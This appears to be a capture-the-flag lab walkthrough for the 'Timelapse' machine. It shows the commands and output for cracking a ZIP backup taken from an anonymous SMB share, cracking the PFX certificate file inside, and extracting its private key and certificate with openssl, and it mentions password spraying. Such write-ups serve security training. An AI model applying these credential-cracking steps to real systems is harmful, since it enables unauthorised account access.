winrm_backup
A backup archive has been found in one of the SMB shares that allows anonymous access. Judging by the name, the archive appears to be relevant to the WinRM service that the target system hosts over the port 5986
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ file winrm_backup.zip
winrm_backup.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ unzip winrm_backup.zip
archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: The archive is a password-protected ZIP archive
Password Cracking
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ zip2john winrm_backup.zip > winrm_backup.zip.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8The archive can be turned into a crack-able hash string using zip2john
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ john ./winrm_backup.zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2023-10-24 18:17) 4.545g/s 15806Kp/s 15806Kc/s 15806KC/s surki..supaluca
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Password hash cracked for the archive
The cracked password is supremelegacy
Additionally, this may be used for a password spraying attack
PFX
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ unzip winrm_backup.zip
archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: legacyy_dev_auth.pfx The extracted content is a PFX file
A PFX file, also known as a PKCS #12 file, is a binary format file that is used to store a variety of cryptographic objects. This file format is typically used for securely storing a private key along with its associated X.509 digital certificate. It’s commonly used in situations where you need to export and back up a private key and certificate, such as in the context of SSL/TLS certificates for web servers or secure email communication.
Additionally, judging by the name of the file, it appears that the PFX file belongs to the legacyy user and the legacyy user is [[Timelapse_RID_Cycling#[RID Cycling](https //www.trustedsec.com/blog/new-tool-release-rpc_enum-rid-cycling-attack/)|confirmed]] to be a valid domain user
Extraction
As explained above, a lot can be done with PFX files since these files contains server certificates, intermediate certificates, and the private keys. It is also entirely possible to extract a public (certificate) and private key pair from a PFX file.
Cracking PFX
PFX files are generated and typically encrypted with a set of password to serve its purpose of securely storing sensitive data. Prior to the public/private keypair extraction described above, it is necessary to decrypt the PFX file itself since it is highly probable that the file is encrypted with a password.
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.pfx.hashpfx2john can be used to turn the PFX file into a crack-able hash string
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ john ./legacyy_dev_auth.pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:06 DONE (2023-10-24 18:37) 0.01502g/s 48535p/s 48535c/s 48535C/s thugwear..thugess
Use the "--show" option to display all of the cracked passwords reliably
Session completed. Password hash cracked for the PFX file
The cracked password is thuglegacy
The password may also be used for a password spraying attack
Now that the decryption password is revealed, the public/private keypair extraction can be proceeded
Private Key
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.private
Enter Import Password: thuglegacy
Enter PEM pass phrase: qwe123
Verifying - Enter PEM pass phrase: qwe123
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ file legacyy_dev_auth.private ; ll legacyy_dev_auth.private
legacyy_dev_auth.private: ASCII text
4.0K -rw------- 1 kali kali 2.1K Oct 24 18:43 legacyy_dev_auth.privateExtracting the private key from the legacyy_dev_auth.pfx file
As expected, openssl prompts for password; thuglegacy
Additionally, it prompts for entering PEM pass phrase
This is totally normal as A PEM key file must have a passphrase to be functional. I set it to qwe123
Decryption
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl rsa -in legacyy_dev_auth.private -out legacyy_dev_auth.private.decrypted
enter pass phrase for legacyy_dev_auth.private: qwe123
writing RSA keyNow that this is a private key, however, it is encrypted with the passphrase that I set above the during the process of extraction; qwe123
So it needs to be decrypted again.
Public Key (Certificate)
┌──(kali㉿kali)-[~/…/labs/timelapse/smb/Dev]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.public
Enter Import Password: Extracting the public(certificate) key from the legacyy_dev_auth.pfx file
I would need to provide the import password here as well; thuglegacy
However, Contrary to the private key extraction above, openssl does not prompts me for providing a passphrase as it is a public key extraction
Since public (certificate) key is not a PEM key, it does not require further decryption